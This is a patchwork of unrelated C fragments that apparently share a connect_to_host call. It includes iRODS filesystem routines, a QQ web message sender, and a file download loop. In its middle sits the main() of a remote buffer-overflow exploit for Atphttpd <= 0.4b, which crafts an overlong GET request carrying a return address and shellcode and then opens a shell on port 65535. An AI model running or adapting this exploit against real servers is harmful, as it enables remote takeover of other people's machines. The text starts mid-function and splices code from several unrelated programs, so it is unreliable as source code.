filename = (char *)emalloc(l+1);
snprintf(filename, l+1, "%s/%s", foldertmp, linebuf);
} else {
filename = (char *)emalloc(10);
snprintf(filename, 10, "/dev/null");
}
file = fopen(filename,"wb");
efree(filename);
chunk = (filesize > MAX_FILE_BUFFER) ? MAX_FILE_BUFFER : filesize;
filebuf = (char *)emalloc(chunk);
remain = filesize;
total = 0;
if (buffer->used > 0){
fwrite(buffer->data, 1, buffer->used, file);
total += buffer->used;
remain -= buffer->used;
buffer->used = 0;
}
fprintf(stderr,"'%s' [%ld/%ld] (%ld%%)", linebuf, (long)total, (long)filesize, (long)(100*total)/filesize);
while (remain > 0) {
read = recv(sockfd, filebuf, chunk, 0);
if (read == -1) {
perror("recv");
global_exit(3);
} else if (read == 0) {
fprintf(stderr,"Server dropped connection.\n");
global_exit(4);
}
total += read;
remain -= read;
fprintf(stderr,"%c[2K\r", 27);
fprintf(stderr,"'%s' [%ld/%ld] (%ld%%)", linebuf, (long)total, (long)filesize, (long)(100*total)/filesize);
fwrite(filebuf, 1, read, file);
}
fprintf(stderr,"%c[2K\r", 27);
printf("'%s' saved. [%ld/%ld]\n", linebuf, (long)total, (long)filesize);
fclose(file);
efree(filebuf);
} else {
verbose("Ignoring unexpected message from server: %s\n", t);
}
efree(line);
}
}
int irods_reli_getdir( const char *host, const char *path, void (*callback) ( const char *path, void *arg ), void *arg )
{
int i;
int result;
int keepgoing;
queryHandle_t query_handle;
genQueryInp_t query_in;
genQueryOut_t *query_out = 0;
sqlResult_t *value;
/* Special case: /irods looks like an empty dir */
if(!host[0]) {
callback(".",arg);
callback("..",arg);
return 0;
}
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
/* First we set up a query for file names */
memset(&query_in,0,sizeof(query_in));
query_out = 0;
rclInitQueryHandle(&query_handle,server->conn);
debug(D_IRODS,"queryDataObjInColl %s %s",host,path);
result = queryDataObjInColl(&query_handle,(char*)path,0,&query_in,&query_out,0);
debug(D_IRODS,"= %d",result);
if(result<0 && result!=CAT_NO_ROWS_FOUND) {
errno = ENOTDIR;
return -1;
}
callback(".",arg);
callback("..",arg);
while(result>=0) {
value = getSqlResultByInx(query_out,COL_DATA_NAME);
if(!value) break;
char *subname = value->value;
for(i=0;i<query_out->rowCnt;i++) {
callback(subname,arg);
subname += value->len;
}
keepgoing = query_out->continueInx;
freeGenQueryOut(&query_out);
if(keepgoing>0) {
query_in.continueInx = keepgoing;
debug(D_IRODS,"rcGenQuery %s",host);
result = rcGenQuery(server->conn,&query_in,&query_out);
debug(D_IRODS,"= %d",result);
} else {
break;
}
}
/* Now we set up a SECOND query for directory names */
memset(&query_in,0,sizeof(query_in));
query_out = 0;
rclInitQueryHandle(&query_handle,server->conn);
debug(D_IRODS,"queryCollInColl %s %s",host,path);
result = queryCollInColl(&query_handle,(char*)path,0,&query_in,&query_out);
debug(D_IRODS,"= %d",result);
if(result<0 && result!=CAT_NO_ROWS_FOUND) {
return 0;
}
while(result>=0) {
value = getSqlResultByInx(query_out,COL_COLL_NAME);
if(!value) break;
char *subname = value->value;
for(i=0;i<query_out->rowCnt;i++) {
callback(subname,arg);
subname += value->len;
}
keepgoing = query_out->continueInx;
freeGenQueryOut(&query_out);
if(keepgoing>0) {
query_in.continueInx = keepgoing;
debug(D_IRODS,"rcGenQuery %s",host);
result = rcGenQuery(server->conn,&query_in,&query_out);
debug(D_IRODS,"= %d",result);
} else {
break;
}
}
return 0;
}
int main(int argc,char **argv) {
int i,sd;
char http_req[LEN];
unsigned long int ret=0,offset=DEFAULT_OFFSET;
printf("(<->) Atphttpd <= 0.4b remote exploit by r-code [email protected]\n");
printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n\n");
if(argc<2 || argc>3) {
printf("[-] Usage: %s [host] <offset> #OFFset\n",argv[0]);
return -1;
}
if(argc>2)
offset=atoi(argv[2]);
ret=0xbffffffa - offset;
printf("<==> OFFSET: 0x%x\n",offset);
printf("<==> RET_ADDR: 0x%x\n",ret);
/* See comment few lines below ;] */
http_req[0x00]='G';
http_req[0x01]='E';
http_req[0x02]='T';
http_req[0x03]=' ';
http_req[0x04]='/';
for(i=0x05; i<LEN;) {
http_req[ALIGN + i++] = (ret & 0x000000ff);
http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8;
http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16;
http_req[ALIGN + i++] = (ret & 0xff000000) >> 24;
}
for(i=0x05; i<(LEN/2); i++)
http_req[i]=0x41; /* Using jump-next instruction instead of nops for a better look ;] */
for(i=0; i<strlen(shellcode); i++)
http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];
http_req[LEN-0x0c]=' ';
http_req[LEN-0x0b]='H';
http_req[LEN-0x0a]='T';
http_req[LEN-0x09]='T';
http_req[LEN-0x08]='P';
http_req[LEN-0x07]='/';
http_req[LEN-0x06]='1';
http_req[LEN-0x05]='.';
http_req[LEN-0x04]='1';
http_req[LEN-0x03]=0x0d;
http_req[LEN-0x02]=0x0a;
http_req[LEN-0x01]=0x00;
/* Yeah.. I know I just could strcpy/cat it ;].. but so it looks soooooo l33t ;] aint`t it ? ;) */
printf("<==> Connecting to '%s' on port '%d'..\n",argv[1],PORT);
if((sd=connect_to_host(argv[1],PORT))<0) {
printf("<==> Couldn`t connect to host.. :-/\n");
exit(1);
}
printf("<==> Sending packets..\n");
if(send(sd,http_req,LEN,0)<0) {
perror("<==> send(): while sending evil http request");
return -1;
}
close(sd);
if((sd=connect_to_host(argv[1],65535))<0) {
printf("<==> Exploit failed..! #Probably due to a bad offset\n");
return -1;
}
printf("\n### Exploit failed ");
fflush(stdout);
sleep(1);
printf("... just kidding ;]\n");
sleep(1);
printf("### Exploit successful - enjoy your shell\n\n");
shell(sd);
return 1;
}
static gint do_send_buddy_msg(QQInfo *info, QQSendMsg *msg, GError **err)
{
GString *uin = msg -> to_uin;
gint ret_code = 0;
gint res = 0;
gchar params[3000];
g_debug("Send msg to %s!(%s, %d)", uin -> str, __FILE__, __LINE__);
Request *req = request_new();
Response *rps = NULL;
request_set_method(req, "POST");
request_set_version(req, "HTTP/1.1");
request_set_uri(req, MSGFRIPATH);
request_set_default_headers(req);
request_add_header(req, "Host", MSGHOST);
request_add_header(req, "Cookie", info -> cookie -> str);
request_add_header(req, "Origin", "http://d.web2.qq.com");
request_add_header(req, "Content-Type",
"application/x-www-form-urlencoded");
request_add_header(req, "Referer"
, "http://"MSGHOST"/proxy.html?v=20110331002&callback=2");
GString *content;
content = qq_sendmsg_contents_tostring(msg);
g_snprintf(params, 3000, "r={\"to\":%s,\"face\":%s,"
"%s,\"msg_id\":%s,"
"\"clientid\":\"%s\",\"psessionid\":\"%s\"}"
, uin -> str, msg -> face -> str
, content -> str
, msg -> msg_id -> str
, info -> clientid -> str
, info -> psessionid -> str);
g_string_free(content, TRUE);
gchar *euri = g_uri_escape_string(params, "=", FALSE);
request_append_msg(req, euri, strlen(euri));
g_free(euri);
g_snprintf(params, 3000, "%u", (unsigned int)strlen(req -> msg -> str));
request_add_header(req, "Content-Length", params);
Connection *con = connect_to_host(MSGHOST, 80);
if(con == NULL){
g_warning("Can NOT connect to server!(%s, %d)"
, __FILE__, __LINE__);
request_del(req);
return -1;
}
send_request(con, req);
res = rcv_response(con, &rps);
close_con(con);
connection_free(con);
if (-1 == res || !rps) {
g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__);
ret_code = -1;
goto error;
}
const gchar *retstatus = rps -> status -> str;
json_t *json = NULL;
if(g_strstr_len(retstatus, -1, "200") == NULL){
/*
* Maybe some error occured.
*/
g_warning("Resoponse status is NOT 200, but %s (%s, %d)"
, retstatus, __FILE__, __LINE__);
ret_code = -1;
goto error;
}
switch(json_parse_document(&json, rps -> msg -> str))
{
case JSON_OK:
break;
default:
g_warning("json_parser_document: syntax error. (%s, %d)"
, __FILE__, __LINE__);
}
json_t *val = json_find_first_label_all(json, "result");
if(val != NULL){
val = val -> child;
if(g_strstr_len(val -> text, -1, "ok") == NULL){
g_warning("Server return error. %s (%s, %d)"
, val -> text, __FILE__, __LINE__);
}
}else{
g_warning("Server return: (%s, %d)%s", __FILE__, __LINE__
, rps -> msg -> str);
}
json_free_value(&json);
error:
request_del(req);
response_del(rps);
return ret_code;
}
struct irods_file * irods_reli_open ( const char *host, const char *path, int flags, int mode )
{
struct irods_file *file;
struct irods_server *server;
dataObjInp_t request;
int result;
server = connect_to_host(host);
if(!server) return 0;
memset(&request,0,sizeof(request));
strcpy(request.objPath,path);
request.openFlags = flags;
debug(D_IRODS,"rcDataObjOpen %s %s",host,path);
result = rcDataObjOpen (server->conn,&request);
debug(D_IRODS,"= %d",result);
if(result<0 && flags&O_CREAT) {
memset(&request,0,sizeof(request));
strcpy(request.objPath,path);
request.createMode = mode;
request.openFlags = flags;
request.dataSize = -1;
addKeyVal (&request.condInput, DATA_TYPE_KW, "generic");
if(irods_env.rodsDefResource[0]) {
addKeyVal (&request.condInput, RESC_NAME_KW,irods_env.rodsDefResource);
}
debug(D_IRODS,"rcDataObjCreate %s %s",host,path);
result = rcDataObjCreate (server->conn,&request);
debug(D_IRODS,"= %d",result);
}
/*
An attempt to open a directory returns CAT_NO_ROWS_FOUND.
For Unix compatibility, we must check for a directory by
that name, and return EISDIR if it exists.
*/
if(result==CAT_NO_ROWS_FOUND) {
struct pfs_stat info;
if(irods_reli_stat(host,path,&info)>=0) {
if(S_ISDIR(info.st_mode)) {
errno = EISDIR;
return 0;
}
}
}
if(result<0) {
errno = irods_reli_errno(result);
return 0;
}
if(flags&O_TRUNC) {
irods_reli_truncate(host,path,0);
}
file = malloc(sizeof(*file));
file->host = strdup(host);
file->path = strdup(path);
file->fd = result;
file->offset = 0;
file->serial = server->serial;
file->flags = flags;
return file;
}
void nopen(char * host, int port)
{
connect_to_host(host, port);
cur_num = 0;
return;
}
int irods_reli_stat ( const char *host, const char *path, struct pfs_stat *info )
{
int result;
dataObjInp_t request;
rodsObjStat_t *response = 0;
/* Special case: /irods looks like an empty dir */
if(!host[0]) {
memset(info,0,sizeof(*info));
info->st_ino = 2;
info->st_dev = -1;
info->st_mode = S_IFDIR | 0755;
info->st_size = 4096;
info->st_blocks = 8;
info->st_nlink = 1;
return 0;
}
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.objPath,path);
debug(D_IRODS,"rcObjStat %s %s",host,path);
result = rcObjStat (server->conn,&request,&response);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
memset(info,0,sizeof(*info));
info->st_ino = hash_string(path);
info->st_dev = -1;
if (response->objType == COLL_OBJ_T) {
info->st_mode = S_IFDIR | 0755;
info->st_size = 4096;
info->st_blocks = 8;
info->st_ctime = atoi (response->createTime);
info->st_mtime = atoi (response->modifyTime);
info->st_nlink = 1;
} else {
info->st_mode = S_IFREG | 0755;
info->st_size = response->objSize;
info->st_blocks = info->st_size/512+1;
info->st_nlink = 1;
}
info->st_blksize = 4096;
info->st_ctime = atoi(response->createTime);
info->st_mtime = atoi(response->modifyTime);
info->st_atime = atoi(response->modifyTime);
free(response);
return 0;
}